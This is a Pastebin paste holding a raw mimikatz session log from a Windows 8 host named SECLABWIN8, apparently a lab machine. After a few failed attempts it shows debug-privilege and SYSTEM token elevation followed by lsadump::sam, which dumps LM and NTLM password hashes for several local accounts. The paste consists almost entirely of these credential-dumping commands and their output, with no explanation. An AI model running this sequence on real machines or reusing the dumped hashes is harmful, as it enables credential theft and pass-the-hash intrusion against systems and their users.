SHARE
TWEET

hi chris

a guest Oct 18th, 2019 87 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Using 'hash.txt' for logfile : OK
  2.  
  3. mimikatz # lsadump::sam
  4. Domain : SECLABWIN8
  5. SysKey : 3938d539c83d8e6a3488325151ad0c05
  6. ERROR kull_m_registry_OpenAndQueryWithAlloc ; kull_m_registry_RegOpenKeyEx KO
  7. ERROR kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x00000005)
  8.  
  9. mimikatz # lsadump::sam
  10. Domain : SECLABWIN8
  11. SysKey : 3938d539c83d8e6a3488325151ad0c05
  12. ERROR kull_m_registry_OpenAndQueryWithAlloc ; kull_m_registry_RegOpenKeyEx KO
  13. ERROR kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x00000005)
  14.  
  15. mimikatz # lsadump::sam SystemBkup.hiv SamBkup.hiv
  16. Domain : SECLABWIN8
  17. SysKey : 3938d539c83d8e6a3488325151ad0c05
  18. ERROR kull_m_registry_OpenAndQueryWithAlloc ; kull_m_registry_RegOpenKeyEx KO
  19. ERROR kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x00000005)
  20.  
  21. mimikatz # token::elevate
  22. Token Id  : 0
  23. User name :
  24. SID name  : NT AUTHORITY\SYSTEM
  25.  
  26. 464 {0;000003e7} 0 D 41960      NT AUTHORITY\SYSTEM S-1-5-18    (04g,20p)   Primary
  27.  -> Impersonated !
  28.  * Process Token : {0;0012310c} 2 D 34369037    SecLabWin8\Administrator    S-1-5-21-3030430307-1650540796-4004713979-500   (14g,23p)   Primary
  29.  * Thread Token  : {0;000003e7} 0 D 34417986    NT AUTHORITY\SYSTEM S-1-5-18    (04g,20p)   Impersonation (Delegation)
  30.  
  31. mimikatz # lsadump::sam SystemBkup.hiv SamBkup.hiv
  32. Domain : SECLABWIN8
  33. SysKey : 3938d539c83d8e6a3488325151ad0c05
  34. Local SID : S-1-5-21-3030430307-1650540796-4004713979
  35.  
  36. SAMKey : e0f17e1c0e355ca390e1e50b00b6d470
  37.  
  38. RID  : 000001f4 (500)
  39. User : Administrator
  40.   Hash LM  : a14dc20682ebc0a35db15e7df7536625
  41.   Hash NTLM: 4fd9671fef737b514356e75063f7dcac
  42.     lm  - 0: a14dc20682ebc0a35db15e7df7536625
  43.     ntlm- 0: 4fd9671fef737b514356e75063f7dcac
  44.     ntlm- 1: 31d6cfe0d16ae931b73c59d7e0c089c0
  45.  
  46. RID  : 000001f5 (501)
  47. User : Guest
  48.  
  49. RID  : 000003e9 (1001)
  50. User : win8
  51.   Hash NTLM: 00277317be7631466e6480877eedba5c
  52.  
  53. RID  : 000003ea (1002)
  54. User : poweruser
  55.   Hash NTLM: 4fd9671fef737b514356e75063f7dcac
  56.  
  57. RID  : 000003eb (1003)
  58. User : snmp
  59.   Hash NTLM: f2477a144dff4f216ab81f2ac3e3207d
  60.  
  61. mimikatz # reg save HKLM\SAM SamBkup.hiv
  62. ERROR mimikatz_doLocal ; "reg" command of "standard" module not found !
  63.  
  64. Module :    standard
  65. Full name : Standard module
  66. Description :   Basic commands (does not require module name)
  67.  
  68.             exit  -  Quit mimikatz
  69.              cls  -  Clear screen (doesn't work with redirections, like PsExec)
  70.           answer  -  Answer to the Ultimate Question of Life, the Universe, and Everything
  71.           coffee  -  Please, make me a coffee!
  72.            sleep  -  Sleep an amount of milliseconds
  73.              log  -  Log mimikatz input/output to file
  74.           base64  -  Switch file input/output base64
  75.          version  -  Display some version informations
  76.               cd  -  Change or display current directory
  77.        localtime  -  Displays system local date and time (OJ command)
  78.         hostname  -  Displays system local hostname
  79.  
  80. mimikatz # privilege::debug
  81. Privilege '20' OK
  82.  
  83. mimikatz # token::elevate
  84. Token Id  : 0
  85. User name :
  86. SID name  : NT AUTHORITY\SYSTEM
  87.  
  88. 464 {0;000003e7} 0 D 41960      NT AUTHORITY\SYSTEM S-1-5-18    (04g,20p)   Primary
  89.  -> Impersonated !
  90.  * Process Token : {0;0012310c} 2 D 34369037    SecLabWin8\Administrator    S-1-5-21-3030430307-1650540796-4004713979-500   (14g,23p)   Primary
  91.  * Thread Token  : {0;000003e7} 0 D 34449475    NT AUTHORITY\SYSTEM S-1-5-18    (04g,20p)   Impersonation (Delegation)
  92.  
  93. mimikatz # log hash.txt
  94. Using 'hash.txt' for logfile : OK
  95.  
  96. mimikatz # lsadump::sam
  97. Domain : SECLABWIN8
  98. SysKey : 3938d539c83d8e6a3488325151ad0c05
  99. Local SID : S-1-5-21-3030430307-1650540796-4004713979
  100.  
  101. SAMKey : e0f17e1c0e355ca390e1e50b00b6d470
  102.  
  103. RID  : 000001f4 (500)
  104. User : Administrator
  105.   Hash LM  : a14dc20682ebc0a35db15e7df7536625
  106.   Hash NTLM: 4fd9671fef737b514356e75063f7dcac
  107.     lm  - 0: a14dc20682ebc0a35db15e7df7536625
  108.     ntlm- 0: 4fd9671fef737b514356e75063f7dcac
  109.     ntlm- 1: 31d6cfe0d16ae931b73c59d7e0c089c0
  110.  
  111. RID  : 000001f5 (501)
  112. User : Guest
  113.  
  114. RID  : 000003e9 (1001)
  115. User : win8
  116.   Hash NTLM: 00277317be7631466e6480877eedba5c
  117.  
  118. RID  : 000003ea (1002)
  119. User : poweruser
  120.   Hash NTLM: 4fd9671fef737b514356e75063f7dcac
  121.  
  122. RID  : 000003eb (1003)
  123. User : snmp
  124.   Hash NTLM: f2477a144dff4f216ab81f2ac3e3207d
  125.  
  126. mimikatz #
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top